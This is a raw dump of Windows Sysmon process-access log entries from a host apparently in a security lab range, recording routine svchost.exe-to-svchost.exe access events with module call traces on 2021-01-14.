13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010834Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010833Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.467{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010832Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.467{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010831Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.467{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010830Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.467{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010829Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.467{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010828Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.467{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010827Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.467{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010826Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010825Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010824Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010823Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010822Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010821Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010820Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010819Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010818Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010817Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010816Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010815Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010814Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010813Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010812Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010811Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 